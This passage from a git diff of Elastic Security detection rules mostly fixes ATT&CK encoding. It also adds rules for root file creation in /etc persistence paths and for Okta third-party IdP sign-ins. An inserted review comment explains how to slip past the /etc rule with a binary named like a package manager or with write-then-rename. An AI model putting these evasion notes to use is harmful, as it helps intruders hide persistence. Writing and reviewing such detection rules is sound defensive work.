b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json index 1709badc4a8..e57c94405da 100644 
--- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json index b21d56c5aac..e9d3943472c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -133,7 +133,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json index 9ed472bd45a..a153140d1f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_105.json 
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -133,7 +133,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json index f2c7d10368a..cd481286ca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json index bbb734dd39d..1d77da810a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
@@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -137,7 +137,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json index 977d9c55870..ca087321879 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_108.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -138,7 +138,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json index 0a0a3fece86..11433945b22 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_109.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
@@ -139,7 +139,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json index b7169efb789..7cd92a7e2e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_110.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -139,7 +139,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json new file mode 100644 index 00000000000..3ba4fd96204 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_111.json 
@@ -0,0 +1,171 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation in /etc for Persistence\n\nThe /etc/ directory in Linux is used to store system-wide configuration files and scripts.\n\nBy creating or modifying specific system-wide configuration files, attackers can leverage system services to execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors for the creation of the most common system-wide configuration files and scripts abused by attackers for persistence. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n- Investigate whether any other files in any of the commonly abused directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve 
Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Cron Job Created or Changed by Previously Unknown Process - ff10d4d8-fea7-422d-afb1-e5a2702369a9\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse 
proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type in (\"creation\", \"file_create_event\") and user.name == \"root\" and\nfile.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\",\n\"/usr/lib/systemd/system/*\") and not process.executable : (\"*/dpkg\", \"*/yum\", \"*/apt\", \"*/dnf\", \"*/rpm\", \"*/systemd\",\n\"*/snapd\", \"*/dnf-automatic\",\"*/yum-cron\", \"*/elastic-agent\", \"*/dnfdaemon-system\", \"*/bin/dockerd\", \"*/sbin/dockerd\",\n\"/kaniko/executor\", \"/usr/sbin/rhn_check\") and not file.extension in (\"swp\", \"swpx\", \"tmp\")\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json index 2c7207d549d..2e5f8d7ae1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_101.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json index 02bc2621bbc..2da6e86f6dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json 
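Review bot: The `not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/rpm", "*/systemd", "*/snapd", ...)` exclusion in the new `query` matches on basename only, so a dropper copied to e.g. `/tmp/dpkg` or `/dev/shm/apt` that writes into `/etc/cron.d/` or `/etc/sudoers.d/` as root is silently excluded from the alert; pinning the legitimate paths the way the list already does for `"/kaniko/executor"` and `"/usr/sbin/rhn_check"` (e.g. `"/usr/bin/dpkg", "/usr/bin/apt", "/usr/bin/yum", "/usr/bin/dnf", "/usr/bin/rpm"`) would close that gap without adding noise. The `not file.extension in ("swp", "swpx", "tmp")` clause has the same shape: a payload created as `foo.tmp` and then renamed into place is only observed as a rename, which `event.type in ("creation", "file_create_event")` does not cover, so the `description` should state this is noise tuning rather than an evasion-resistant filter, e.g. "Note: the process and extension exclusions reduce package-manager and editor noise and can be bypassed by a binary named after a package manager or by write-then-rename." Separately, the investigation guide's osquery lists `/etc/init.d/%` and `/etc/rc%.d/%` while the query only watches `/etc/rc.d/init.d/*`; whether `/etc/init.d` creations on Debian-style hosts are handled by the related `Potential Persistence Through init.d Detected` rule named in the note cannot be confirmed from this file, so the guide should say which rule owns that path.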
+++ b/packages/security_detection_engine/kibana/security_rule/1c966416-60c1-436b-bfd0-e002fddbfd89_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json b/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json index 7c9b7936c8b..e8efc976b3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1ca62f14-4787-4913-b7af-df11745a49da_1.json @@ -41,7 +41,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json index a0ff7c96b7e..486534d06d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_103.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json index c4ee8676d06..ac330ddfb52 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_104.json 
@@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json index 46fe5fc49d0..a0d1cbce775 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_105.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json index acfc0071bbf..ea4c9c17401 100644 --- a/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1cd01db9-be24-4bef-8e7c-e923f0ff78ab_106.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json index f24b3e4f1fa..8f00a0215ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_1.json 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json new file mode 100644 index 00000000000..06b7ea59f6e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects sign-in events where authentication is carried out via a third-party Identity Provider (IdP).", + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "interval": "15m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Okta Sign-In Events via Third-Party IdP", + "note": "## Triage and analysis\n\n### Investigating Okta Sign-In Events via Third-Party IdP\n\nThis rule detects sign-in events where authentication is carried out via a third-party Identity Provider (IdP).\n\nAdversaries may attempt to add an unauthorized IdP to an Okta tenant to gain access to the tenant. Following this action, adversaries may attempt to sign in to the tenant using the unauthorized IdP. This rule detects both the addition of an unauthorized IdP and the subsequent sign-in attempt.\n\n#### Possible investigation steps:\n- Identify the third-party IdP by examining the `okta.authentication_context.issuer.id` field.\n- Once the third-party IdP is identified, determine if this IdP is authorized to be used by the tenant.\n- If the IdP is unauthorized, deactivate it immediately via the Okta console.\n- Identify the actor associated with the IdP creation by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields in historical data.\n - The `New Okta Identity Provider (IdP) Added by Admin` rule may be helpful in identifying the actor and the IdP creation event.\n- Determine the client used by the actor. 
Review the `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- If the client is a device, check the `okta.device.id`, `okta.device.name`, `okta.device.os_platform`, `okta.device.os_version`, and `okta.device.managed` fields.\n- Review the past activities of the actor involved in this action by checking their previous actions logged in the `okta.target` field.\n- Examine the `okta.request.ip_chain` field to potentially determine if the actor used a proxy or VPN to perform this action.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n\n### False positive analysis:\n- It might be a false positive if this IdP is authorized to be used by the tenant.\n- This may be a false positive if an authorized third-party IdP is used to sign in to the tenant but failures occurred due to an incorrect configuration.\n\n### Response and remediation:\n- If the IdP is unauthorized, deactivate it immediately via the Okta console.\n- Reset the effected user's password and enforce MFA re-enrollment, if applicable.\n- Mobile device forensics may be required to determine if the user's device is compromised.\n- If the IdP is authorized, ensure that the actor who created it is authorized to do so.\n- If the actor is unauthorized, deactivate their account via the Okta console.\n- If the actor is authorized, ensure that the actor's account is not compromised.\n\n- Block the IP address or device used in the attempts if they appear suspicious, using the data from the `okta.client.ip` and `okta.device.id` fields.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- If the deactivated IdP was crucial to the organization, consider adding a new IdP and removing the unauthorized IdP.", + "query": "event.dataset:okta.system and 
